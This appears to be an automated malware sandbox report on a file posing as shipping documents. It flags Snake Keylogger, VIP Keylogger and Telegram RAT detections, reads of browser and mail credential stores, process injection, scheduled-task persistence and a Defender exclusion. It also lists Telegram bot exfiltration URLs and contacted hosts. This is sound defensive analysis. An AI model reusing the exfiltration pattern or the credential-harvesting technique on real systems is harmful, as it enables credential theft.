Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Queries volume information: C:\Users\user\AppData\Roaming\tdcorV.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5520, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3917772497.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5520, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5520, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5520, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3917772497.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 5520, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544369 Sample: rShippingDocuments240384.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 3 other IPs or domains 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Sigma detected: Scheduled temp file as task from temp location 2->62 68 11 other signatures 2->68 8 rShippingDocuments240384.exe 7 2->8         started        12 tdcorV.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\Roaming\tdcorV.exe, PE32 8->38 dropped 40 C:\Users\user\...\tdcorV.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp1FC2.tmp, XML 8->42 dropped 44 C:\Users\...\rShippingDocuments240384.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Writes to foreign memory regions 8->72 74 Allocates memory in foreign processes 8->74 76 Adds a directory exclusion to Windows Defender 8->76 14 RegSvcs.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        78 Multi AV Scanner detection for dropped file 12->78 80 Machine Learning detection for dropped file 12->80 82 Injects a PE file into a foreign processes 12->82 24 RegSvcs.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49741, 51300 TELEGRAMRU United Kingdom 14->52 54 reallyfreegeoip.org 188.114.97.3, 443, 49708, 49710 CLOUDFLARENETUS European Union 14->54 56 2 other IPs or domains 14->56 84 Loading BitLocker PowerShell Module 18->84 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        86 Tries to steal Mail credentials (via file / registry access) 24->86 88 Tries to harvest and steal browser information (history, passwords, etc) 24->88 36 conhost.exe 26->36         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
166.62.28.124
 mail.bulatpharmaceutical.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
132.226.247.73
 checkip.dyndns.com United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.97.3 true
mail.bulatpharmaceutical.com 166.62.28.124 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.247.73 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2021:03:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    https://reallyfreegeoip.org/xml/173.254.250.72 false
      		unknown
      http://checkip.dyndns.org/ false
      • URL Reputation: safe
      		 unknown
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2020:43:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
        		unknown